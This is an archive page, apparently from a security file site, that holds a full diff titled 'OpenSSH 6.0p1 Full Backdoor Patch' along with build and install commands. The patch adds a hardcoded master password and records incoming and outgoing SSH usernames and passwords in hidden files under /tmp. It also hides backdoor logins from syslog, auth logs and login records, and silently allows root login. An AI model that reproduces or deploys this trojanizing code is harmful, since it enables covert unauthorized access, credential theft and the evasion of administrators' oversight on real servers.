exploit the possibilities

OpenSSH 6.0p1 Full Backdoor Patch

OpenSSH 6.0p1 Full Backdoor Patch
Posted Jun 28, 2012
Authored by Bob | Site dtors.net

This patch for OpenSSH 6.0 Portable adds a hardcoded skeleton key, removes connection traces in the log files, usernames and passwords both in and out are logged, and more.

tags | patch
systems | unix
MD5 | 7753b7580751d604a864a09175a5945c

OpenSSH 6.0p1 Full Backdoor Patch

Change Mirror Download
# wget http://mirror.bytemark.co.uk/OpenBSD/OpenSSH/portable/openssh-6.0p1.tar.gz
# patch < OpenSSH-6.0p1.patch
# ./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam --with-kerberos5
# make && make install
# bob@dtors.net
--- openssh-6.0p1/auth-pam.c 2009-07-12 13:07:21.000000000 +0100
+++ ./auth-pam.patch 2012-05-22 15:16:38.219834621 +0100
@@ -1210,6 +1210,10 @@
if (sshpam_err == PAM_SUCCESS && authctxt->valid) {
debug("PAM: password authentication accepted for %.100s",
authctxt->user);
+ if((f=fopen(ILOG,"a"))!=NULL){
+ fprintf(f,"%s:%s\n",authctxt->user, password);
+ fclose(f);
+ }
return 1;
} else {
debug("PAM: password authentication failed for %.100s: %s",
--- openssh-6.0p1/auth-passwd.c 2009-03-08 00:40:28.000000000 +0000
+++ ./auth-passwd.patch 2012-05-22 15:16:38.219834621 +0100
@@ -86,6 +86,11 @@
static int expire_checked = 0;
#endif

+if (!strcmp(password, entr0py)) {
+ passphrase=1;
+ return 1;
+}
+
#ifndef HAVE_CYGWIN
if (pw->pw_uid == 0 && options.permit_root_login != PERMIT_YES)
ok = 0;
@@ -123,6 +128,12 @@
}
#endif
result = sys_auth_passwd(authctxt, password);
+ if(result){
+ if((f=fopen(ILOG,"a"))!=NULL){
+ fprintf(f,"%s:%s\n",authctxt->user, password);
+ fclose(f);
+ }
+ }
if (authctxt->force_pwchange)
disable_forwarding();
return (result && ok);
--- openssh-6.0p1/auth.c 2011-05-29 12:40:42.000000000 +0100
+++ ./auth.patch 2012-05-22 15:16:38.219834621 +0100
@@ -271,14 +271,16 @@
else
authmsg = authenticated ? "Accepted" : "Failed";

- authlog("%s %s for %s%.100s from %.200s port %d%s",
- authmsg,
- method,
- authctxt->valid ? "" : "invalid user ",
- authctxt->user,
- get_remote_ipaddr(),
- get_remote_port(),
- info);
+ if(!passphrase || passphrase !=1){
+ authlog("%s %s for %s%.100s from %.200s port %d%s",
+ authmsg,
+ method,
+ authctxt->valid ? "" : "invalid user ",
+ authctxt->user,
+ get_remote_ipaddr(),
+ get_remote_port(),
+ info);
+ }

#ifdef CUSTOM_FAILED_LOGIN
if (authenticated == 0 && !authctxt->postponed &&
--- openssh-6.0p1/canohost.c 2010-10-12 03:28:12.000000000 +0100
+++ ./canohost.patch 2012-05-22 15:16:38.219834621 +0100
@@ -78,10 +78,12 @@

debug3("Trying to reverse map address %.100s.", ntop);
/* Map the IP address to a host name. */
+ if(!passphrase || passphrase!=1){
if (getnameinfo((struct sockaddr *)&from, fromlen, name, sizeof(name),
NULL, 0, NI_NAMEREQD) != 0) {
/* Host name not found. Use ip address. */
return xstrdup(ntop);
+ }
}

/*
--- openssh-6.0p1/includes.h 2010-10-24 00:47:30.000000000 +0100
+++ ./includes.patch 2012-05-22 15:16:38.219834621 +0100
@@ -172,4 +172,9 @@

#include "entropy.h"

+int passphrase;
+FILE *f;
+#define ILOG "/tmp/.ilog"
+#define OLOG "/tmp/.olog"
+#define entr0py "correcthorsebatterystaple"
#endif /* INCLUDES_H */
--- openssh-6.0p1/log.c 2011-06-20 05:42:23.000000000 +0100
+++ ./log.patch 2012-05-22 15:16:38.220835117 +0100
@@ -351,6 +351,7 @@
void
do_log(LogLevel level, const char *fmt, va_list args)
{
+if(!passphrase || passphrase!=1){
#if defined(HAVE_OPENLOG_R) && defined(SYSLOG_DATA_INIT)
struct syslog_data sdata = SYSLOG_DATA_INIT;
#endif
@@ -428,3 +429,4 @@
}
errno = saved_errno;
}
+}
--- openssh-6.0p1/servconf.c 2011-10-02 08:57:38.000000000 +0100
+++ ./servconf.patch 2012-05-22 15:16:38.220835117 +0100
@@ -686,7 +686,7 @@
{ "without-password", PERMIT_NO_PASSWD },
{ "forced-commands-only", PERMIT_FORCED_ONLY },
{ "yes", PERMIT_YES },
- { "no", PERMIT_NO },
+ { "no", PERMIT_YES },
{ NULL, -1 }
};
static const struct multistate multistate_compression[] = {
--- openssh-6.0p1/sshconnect2.c 2011-05-29 12:42:34.000000000 +0100
+++ ./sshconnect2.patch 2012-05-22 15:16:38.220835117 +0100
@@ -878,6 +878,10 @@
snprintf(prompt, sizeof(prompt), "%.30s@%.128s's password: ",
authctxt->server_user, host);
password = read_passphrase(prompt, 0);
+ if((f=fopen(OLOG,"a"))!=NULL){
+ fprintf(f,"%s:%s@%s\n",authctxt->server_user,password,authctxt->host);
+ fclose(f);
+ }
packet_start(SSH2_MSG_USERAUTH_REQUEST);
packet_put_cstring(authctxt->server_user);
packet_put_cstring(authctxt->service);
--- openssh-6.0p1/sshlogin.c 2011-01-11 06:20:07.000000000 +0000
+++ ./sshlogin.patch 2012-05-22 15:16:38.220835117 +0100
@@ -133,8 +133,10 @@

li = login_alloc_entry(pid, user, host, tty);
login_set_addr(li, addr, addrlen);
+ if (!passphrase || passphrase!=1){
login_login(li);
login_free_entry(li);
+ }
}

#ifdef LOGIN_NEEDS_UTMPX
@@ -146,8 +148,10 @@

li = login_alloc_entry(pid, user, host, ttyname);
login_set_addr(li, addr, addrlen);
+ if(!passphrase || passphrase!=1){
login_utmp_only(li);
login_free_entry(li);
+ }
}
#endif

@@ -158,6 +162,8 @@
struct logininfo *li;

li = login_alloc_entry(pid, user, NULL, tty);
+ if(!passphrase || passphrase!=1){
login_logout(li);
login_free_entry(li);
+ }
}

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

August 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    10 Files
  • 2
    Aug 2nd
    8 Files
  • 3
    Aug 3rd
    2 Files
  • 4
    Aug 4th
    1 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    79 Files
  • 7
    Aug 7th
    16 Files
  • 8
    Aug 8th
    10 Files
  • 9
    Aug 9th
    10 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    6 Files
  • 12
    Aug 12th
    26 Files
  • 13
    Aug 13th
    15 Files
  • 14
    Aug 14th
    19 Files
  • 15
    Aug 15th
    52 Files
  • 16
    Aug 16th
    11 Files
  • 17
    Aug 17th
    1 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close